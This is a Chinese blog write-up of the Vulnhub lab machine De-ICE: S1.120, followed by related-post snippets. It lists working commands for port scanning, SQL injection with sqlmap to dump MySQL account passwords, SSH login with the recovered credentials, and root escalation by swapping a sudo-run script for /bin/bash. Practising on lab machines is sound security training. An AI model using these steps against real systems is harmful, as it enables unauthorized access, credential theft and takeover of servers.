De-ICE: S1.120

于 2024-09-14 11:25:11 发布
阅读量401 收藏 5
点赞数 5
文章标签: 网络 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78815619/article/details/142252893
版权

一、导入靶机需要先配置网卡

1.靶机网卡

靶机默认仅主机网卡IP为192.168.1.120,最好设置一个与靶机同网段的网卡

2.kali网卡

给kali添加一个网卡,并设置为仅主机,并且网段为1

二、对靶机进行服务探测和端口扫描

1.利用nmap对靶机IP进行扫描
nmap -sV -O 192.168.1.120

2.进行靶机IP访问

已知靶机开启了80等端口,直接访问web

3、对靶机进行目录扫描

dirsearch -u http://192.168.1.120  经过拼接访问,没啥重要信息

4、在主页面继续尝试挖掘

在点击到Add的时候,发现页面跳转到一个提交页面

5.尝试随便输入一个值,点击提交 没什么发现

6、尝试点击页面可的地方(View Products)

7、再吃尝试点击提交

发现出现了参数,直接SQL注入

三、利用sqlmap进行测试

1、利用sqlmap跑
sqlmap -u "http://192.168.1.120/products.php?id=1" --random-agent --batch

发现存在漏洞

2、获取数据库
sqlmap -u "http://192.168.1.120/products.php?id=1" --dbs --random-agent --batch

3、获取Mysql库下面的账户信息
sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql --users --password --random-agent --batch

经过尝试,使用其账户进行SSH登录,最终使用账户:ccoffee  密码:starwars 登录(刚开始已经扫描出了22端口了)

四、提权

1、先远程连接上SSH

2、利用SUID提权

枚举出所有带有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

3、通过查找文件发现/home/ccoffee/scripts/getlogs.sh文件可以提权

(1)先切换到/home/ccoffee/scripts目录下

(2)输入以下命令

mv getlogs.sh getlogs.sh.bak  #先把原文件备份下来
echo "/bin/bash" >  getlogs.sh  #写入一个/bin/bash到和原文件名一样的文件中
chmod +x getlogs.sh  #给该文件加权限

 

(3)使用sudo 运行getlogs.sh文件

提权成功

2301_78815619
关注
Vulnhub靶机系列:De-ICE: S1.120
01-09
https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完...
Vuluhub靶场-breach1
ad12456的博客
05-03 1660
网络设置和准备: 该靶场的ip:192.168.110.140 ,我们要设置为仅主机模式。在虚拟机中将仅主机模式的ip地址范围包含靶机的ip。除了网络设置,还要准备两台kali。一台连接外网,一台和靶机一样要仅主机模式。 信息收集 Nmap扫描 启动靶机,启动kali攻击机。现在了解的信息就一个:IP。首先用nmap扫描端口,看看开启了什么服务。 namp -T4 -A -v 192.168.110.140 发现端口大量的开放,推测应该是安装了蜜罐之类的防护。那我们用最常用的服务端口:80 试一试看
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
最新发布
2301_78721909的博客
07-30 405
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 368
【代码】De-ICE_S1.120靶机渗透测试。
漏洞靶场实战-Vuluhub medium_socnet
qq_53058639的博客
02-04 529
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
ice-project:从 code.google.compice-project 自动导出
06-17
冰项目 介绍 我们的重点是温盐对流对极地海洋冰的凝固和融化过程的影响。 我们使用标准的 Lattice Boltzmann 方程求解器来积分 Navier-Stokes 方程与温度和盐分的对流扩散方程耦合。 相变过程是通过焓公式实现的。...
新版完整标准 IEC 60947-6-1-2021.pdf
04-14
新版完整标准 IEC 60947-6-1-2021.pdf
webrtc-multichat:使用SimpleWebRTC.js的多聊天视频
05-19
在"webrtc-multichat"中,可能使用WebSocket或其他类似的信令机制来传递SDP(Session Description Protocol)和ICE(Interactive Connectivity Establishment)候选信息,以协商和建立连接。 3. **SimpleWebRTC.js*...
vlc-control-node:使用 Node.js 控制您的 VLC。 带有包装器的 JS
07-08
vlc-控制节点 节点模块JS 用包装器控制你的 ... addToPlaylist ( encodeURI ( "D:\\Outras\\2008 - Black Ice\\ACDC - Black Ice - 01 - Rock n Roll Train.mp3" ) ) ; //add this music in a playlist 测试 在文件夹
[vuluhub]-(GoldenEye)
weixin_47920370的博客
08-25 1103
我们在国外漏洞库搜索的时候,发现他要是用PSpellShell,经过仔细寻找,然后我们在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor。hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九头蛇对pop3进行爆破。用邮件里面的用户名和密码进行登陆一下。..
Vluhub 靶场
jieli0901227的博客
10-27 1908
1、什么是Vluhub Vluhub是一个基于docker和docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单 Vluhub 官方地址Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。https://vulhub.org/ 2、靶场搭建 我们使用在kali中进行安装 2.1 docke
sx:快速强大易于使用的现代化网络扫描器
m0_59598029的博客
08-02 273
运行速度比Nmap要快30倍;ARP扫描:支持扫描本地网络以检测活动设备;ICMP扫描:使用高级ICMP扫描技术来检测活动主机和防火墙规则;TCP SYN扫描:传统半开放扫描以查找开放TCP端口;TCP FIN/NULL/XMAS扫描:扫描某些防火墙绕过技术;自定义TCP扫描:发送任意形式数据包,并获得回复数据包中设置的所有TCP标志的结果;UDP扫描:扫描UDP端口并获取全部ICMP响应,以检测开放端口和防火墙规则;
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 424
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
vulvhub-----Hacker-KID靶机,2024年最新这是一份面向网络安全开发者的复习指南
2401_83947353的博客
04-14 493
80端口是一个正常的页面,但查看源代码中,看到“ Use a GET parameter page_no to view pages”字样,他的意思是通过GET方法,传入一个page_no的参数9999端口是一个登陆页面,想办法获取账号密码发送到intruder模块,将‘1’添加payload,从1-50开始爆破,爆破后21数值的长度不一样。
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1200
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
vulvhub-----Hacker-KID靶机
woshicainiao666的博客
02-18 567
bashrc 文件是一个在 Bash shell 启动时自动执行的脚本文件。Bash 是 Linux 和其他 UNIX-like 系统中常用的 shell,而 .bashrc 文件通常位于用户的主目录下(例如,/home/username/ 或 ~),并且通常包含用户的个性化设置和别名等。想要执行成功,需要root进程进行注入,python2.7 exp.py 2185,root进程太多,写一个简单的shell脚本。,是一个注册页面,查看源码,发现是xml格式,猜测是XXE漏洞,抓包验证。
De-ICE_S1.120超详细靶场实战
weixin_68615160的博客
07-29 179
发现有很多用户,我们挨个登录,发现ccoffee用户可以提权。我们切换到/home/ccoffee/scripts目录下。发现靶机开启了21、22、80、443、3306端口。使用sudo 运行getlogs.sh文件。我们这里使用finalshell连接。发现url地址出现新的参数。第一反应进行sql注入测试。选择产品1,点击提交。
cd C:\Program Files\FlightGear fgfs --fg-root=C:\Program Files\FlightGear\data --aircraft=ufo --in-air --fdm=null --telnet=5501 --telnet=5502 --telnet=5503 --disable-ai-traffic --disable-real-weather-fetch --disable-random-objects --disable-terrasync --disable-clouds --disable-sound --disable-panel --disable-hud --disable-specular-highlight --timeofday=noon --prop:/sim/rendering/multi-sample-buffers=1 --prop:/sim/rendering/multi-samples=2 --prop:/sim/rendering/draw-mask-clouds=false --prop:/sim/rendering/draw-mask-terrain=true --prop:/sim/rendering/draw-mask-objects=true --prop:/sim/rendering/draw-mask-lights=true --prop:/sim/rendering/draw-mask-internal=true --prop:/sim/rendering/draw-mask-cockpit=true --prop:/sim/rendering/draw-mask-effects=true --prop:/sim/rendering/draw-mask-overlay=true --prop:/sim/rendering/draw-mask-world=true --prop:/sim/rendering/draw-mask-panel=true --prop:/sim/rendering/draw-mask-vr=true --prop:/sim/rendering/draw-mask-2d=true --prop:/sim/rendering/draw-mask-3d=true --prop:/sim/rendering/draw-mask-sky=true --prop:/sim/rendering/draw-mask-shadows=true --prop:/sim/rendering/draw-mask-cabin=true --prop:/sim/rendering/draw-mask-weather=true --prop:/sim/rendering/draw-mask-stereo=true --prop:/sim/rendering/draw-mask-internal-cockpit=true --prop:/sim/rendering/draw-mask-internal-windows=true --prop:/sim/rendering/draw-mask-internal-instruments=true --prop:/sim/rendering/draw-mask-internal-overlay=true --prop:/sim/rendering/draw-mask-internal-effects=true --prop:/sim/rendering/draw-mask-internal-lights=true --prop:/sim/rendering/draw-mask-internal-world=true --prop:/sim/rendering/draw-mask-internal-panel=true --prop:/sim/rendering/draw-mask-internal-3d=true --prop:/sim/rendering/draw-mask-internal-sky=true --prop:/sim/rendering/draw-mask-internal-cabin=true --prop:/sim/rendering/draw-mask-internal-weather=true --prop:/sim/rendering/draw-mask-internal-stereo=true --prop:/sim/rendering/draw-mask-internal-shadow=true --prop:/sim/rendering/draw-mask-internal-stall=true --prop:/sim/rendering/draw-mask-internal-aoa=true --prop:/sim/rendering/draw-mask-internal-thermal=false --prop:/sim/rendering/draw-mask-internal-ice=false --prop:/sim/rendering/draw-mask-internal-glass=true --prop:/sim/rendering/draw-mask-internal-dead=true --prop:/sim/rendering/draw-mask-internal-reflection=true程序显示错误unknown command-line option: enable-hud-2d怎么解决
05-10
-disable-random-objects --disable-terrasync --disable-clouds --disable-sound --disable-panel --timeofday=noon --prop:/sim/rendering/multi-sample-buffers=1 --prop:/sim/rendering/multi-samples=2 --prop:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值